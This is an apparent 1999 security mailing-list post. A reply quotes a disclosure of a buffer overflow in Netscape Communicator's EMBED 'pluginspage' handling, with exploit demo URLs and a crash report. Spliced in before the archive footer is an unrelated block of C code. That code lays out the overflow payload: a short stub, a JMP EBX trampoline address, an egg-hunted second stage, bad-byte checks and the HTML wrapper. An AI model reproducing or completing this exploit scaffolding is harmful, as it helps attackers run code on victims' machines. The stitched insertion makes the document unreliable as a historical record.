I tried the URL for the notepad.exe on a Windows 95 (4.00.950a) machine, Pentium II 266 w/ 56 MB of RAM, using Netscape Communicator 4.05 Preview Release 1 (AWT 1.1.5), even though these are coded for Win98. When I went there with NC 4.05, it gave me a blue screen of death that was completely unrecoverable. I had to reboot the system. So, basically, it is a DoS for Netscape users, and could possibly be coded into a CGI or JavaScript that checks the browser version and writes the corresponding exploit code. Just a thought.

-Kerb

On Thursday, September 02, 1999 9:46 AM, DEF CON ZERO WINDOW [SMTP:defcon0at_private] wrote:
: Hi,
:
: I discovered a buffer overflow bug which causes a huge security hole in
: `Netscape Communicator 4.06J, 4.5J - 4.6J, 4.61e' (probably versions from
: 3.0 on).
:
: The problem of this application is in the handling of the EMBED TAG; a
: buffer overflow is caused if a long string is specified in the
: "pluginspage" option. I coded an exploit program to execute any command on
: the victim machine. I tested it on Windows98.
:
: However, this program directly specifies the address of the system()
: function which is defined in msvcrt.dll, so this program does not work on
: a Windows machine which has another version of msvcrt.dll installed (this
: program is for version 6.00.8397).
:
: The reason that I specified the immediate address of the function is that
: the buffer into which the exploit code can be written is very short; the
: size of the writable buffer is about 83 bytes. The buffer is too small to
: put in the code which gets the addresses of the functions defined in
: "msvcrt.dll".
:
: However, this problem will be solved if code that searches for the attack
: code and executes it is put in the exploit code. The attack code can also
: be written in the other buffer.
:
: # An attack code could be written in 2300 bytes to stack_bottom.
:
: A trojan or virus can be written in the attack code, so this problem is
: very serious.
:
: In this case, the stack pointer (ESP) when the overflow is caused differs
: with the environment. So, the method of overwriting the RET address cannot
: be used to exploit it. This example overwrites the handler address of the
: access violation; the exploit code is called when the access violation is
: caused. When the access violation is caused, the address of the exploit
: buffer is stored in the EBX register. So, I overwrite the handler address
: with the address of code where a "JMP EBX" instruction is written.
:
: You can quickly test this exploit on my site. I have prepared some
: versions of exploits that execute "welcome.exe" on your Windows98 machine.
: If you are a user of one of the specified versions of Netscape, please
: test. I did not code the exploit program for WindowsNT and Windows95, but
: they also contain the same problem.
:
: ... and this problem can't be avoided.
:
:
: [ exploit demo page ]
:
: exec "welcome.exe" - nc4x_ex.c
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi
:
: exec "notepad.exe"
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
:
: ---
:
: [ exploit test ]
:
: blue screen (int 01h)
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
:
:
: [ document (japanese) ]
: http://www.ugtop.com/defcon0/hc/nc4x_ex_demo.htm
:
:
: special thanks:
: UNYUN ( The Shadow Penguin Security )
: http://shadowpenguin.backsection.net/
:
:
: --
:
: R00t Zer0 - http://www.ugtop.com/defcon0/index.htm
:
: E-Mail: defcon0at_private
:
: --
:
: "HP/UX is the worst OS for the hacker..." - Mark Abene
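The two-buffer layout the quoted post describes (an 83-byte "pluginspage" stub in front of the overwritten access-violation handler slot, a "JMP EBX" trampoline in that slot, and a larger second buffer that the stub hunts for), written out as an added example. This is not nc4x_ex.c or any code from this thread: the trampoline address, the egg marker, the placeholder stub bytes and the choice of a second EMBED attribute to carry the larger buffer are all assumptions, and the program only builds and checks the byte layout, it does not attack a browser. The one constraint the post leaves implicit and this example enforces is that a string overflow delivered through an HTML attribute cannot carry a NUL (it ends the copy) or a '"' or '>' (they end the attribute or the tag), which also rules out trampoline addresses containing such bytes.

```c
/* Added example, not the author's nc4x_ex.c: lays out the two buffers the
 * post describes for the EMBED "pluginspage" overflow and checks the
 * constraints a string-based overflow in an HTML attribute imposes.
 * TRAMPOLINE, EGG and the attribute carrying stage 2 are ASSUMED. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define STUB_MAX    83          /* writable bytes before the handler slot (from the post) */
#define STAGE2_MAX  2300        /* room for the real attack code (from the post) */
#define TRAMPOLINE  0x77F0AA55u /* ASSUMED address of a "JMP EBX" in some loaded DLL */
#define EGG         "w00t"      /* ASSUMED marker the stub scans memory for */

/* Bytes that cannot survive inside a quoted attribute value: NUL ends the
 * C string before the copy, '"' ends the attribute, '>' ends the tag. */
static int has_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == '"' || p[i] == '>')
            return 1;
    return 0;
}

/* Buffer 1: the pluginspage value. The short stub goes first (EBX points
 * here when the access violation is raised), NOP padding fills the rest of
 * the 83 bytes, and the next 4 bytes land on the handler address that gets
 * overwritten (little-endian). Returns bytes written, or -1 on a violation. */
int build_pluginspage(unsigned char *out, size_t outsz,
                      const unsigned char *stub, size_t stublen,
                      uint32_t trampoline)
{
    if (stublen > STUB_MAX || outsz < STUB_MAX + 4)
        return -1;
    memcpy(out, stub, stublen);
    memset(out + stublen, 0x90, STUB_MAX - stublen); /* stub must not fall through */
    for (int i = 0; i < 4; i++)
        out[STUB_MAX + i] = (unsigned char)(trampoline >> (8 * i));
    return has_bad_byte(out, STUB_MAX + 4) ? -1 : (int)(STUB_MAX + 4);
}

/* Buffer 2: marker followed by the real attack code, up to 2300 bytes. */
int build_stage2(unsigned char *out, size_t outsz,
                 const unsigned char *payload, size_t n)
{
    size_t egglen = strlen(EGG);
    if (egglen + n > STAGE2_MAX || egglen + n > outsz)
        return -1;
    memcpy(out, EGG, egglen);
    memcpy(out + egglen, payload, n);
    return has_bad_byte(out, egglen + n) ? -1 : (int)(egglen + n);
}

/* What the 83-byte stub has to do at run time: scan for the marker and
 * return the offset of the code right after it, or -1 if it is absent. */
long find_egg(const unsigned char *mem, size_t n)
{
    size_t egglen = strlen(EGG);
    for (size_t i = 0; i + egglen <= n; i++)
        if (memcmp(mem + i, EGG, egglen) == 0)
            return (long)(i + egglen);
    return -1;
}

/* Wraps both buffers in an EMBED tag. Carrying stage 2 in the "name"
 * attribute is an assumption; the post only says "the other buffer".
 * %.*s is safe here because both buffers were checked for NUL bytes. */
int emit_html(char *buf, size_t bufsz, const unsigned char *pp, int pplen,
              const unsigned char *s2, int s2len)
{
    if (pplen < 0 || s2len < 0)
        return -1;
    int n = snprintf(buf, bufsz,
        "<html><body><embed src=\"x.dat\" pluginspage=\"%.*s\" name=\"%.*s\"></body></html>\n",
        pplen, (const char *)pp, s2len, (const char *)s2);
    return (n < 0 || (size_t)n >= bufsz) ? -1 : n;
}

int main(void)
{
    /* Constructed placeholders, not real machine code or a real payload. */
    unsigned char stub[] = { 0xEB, 0xFE };             /* "jmp $" stands in for the hunter */
    unsigned char code[] = "ATTACK-CODE-GOES-HERE";
    unsigned char pp[STUB_MAX + 4], s2[STAGE2_MAX];
    char html[4096];
    int pplen = build_pluginspage(pp, sizeof pp, stub, sizeof stub, TRAMPOLINE);
    int s2len = build_stage2(s2, sizeof s2, code, sizeof code - 1);
    int n = emit_html(html, sizeof html, pp, pplen, s2, s2len);
    printf("pluginspage=%d bytes, stage2=%d bytes, html=%d bytes, payload at stage2+%ld\n",
           pplen, s2len, n, find_egg(s2, (size_t)s2len));
    return n > 0 ? 0 : 1;
}
```

The point of splitting the work this way is the one the post makes: with only about 83 bytes before the handler slot, the first buffer can hold a locator loop but not code that resolves msvcrt.dll exports, so anything version-independent has to live in the second, larger buffer and be found at run time rather than addressed statically.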
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:52 PDT